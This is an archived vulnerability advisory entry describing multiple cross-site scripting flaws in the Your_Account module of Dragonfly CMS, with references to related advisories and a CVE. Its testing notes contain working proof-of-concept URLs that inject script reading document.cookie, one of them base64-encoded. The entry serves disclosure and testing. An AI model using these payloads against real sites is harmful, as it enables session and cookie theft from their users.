CPG Dragonfly CMS Your_Account Module Multiple Variable XSS

2006-02-22T07:17:34
ID OSVDB:23408
Type osvdb
Reporter OSVDB
Modified 2006-02-22T07:17:34

Description

Manual Testing Notes

http://[target]/index.php?name=Your_Account&error=1&uname=bGFsYWxh"><script>alert(document.cookie)</script> http://[target]/index.php?name=Your_Account&error=1"><script>alert(document.cookie)</script>&uname=bGFsYWxh http://[target]/index.php?name=Your_Account&error=1&uname=PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+

References:

Vendor URL: http://dragonflycms.org/ Security Tracker: 1015661 Secunia Advisory ID:18940 Related OSVDB ID: 23410 Related OSVDB ID: 23409 Related OSVDB ID: 23411 Related OSVDB ID: 23412 Related OSVDB ID: 23413 Related OSVDB ID: 23414 Related OSVDB ID: 23415 Other Advisory URL: http://lostmon.blogspot.com/2006/02/multiple-cross-site-scripting-in.html FrSIRT Advisory: ADV-2006-0688 CVE-2006-1033 Bugtraq ID: 16784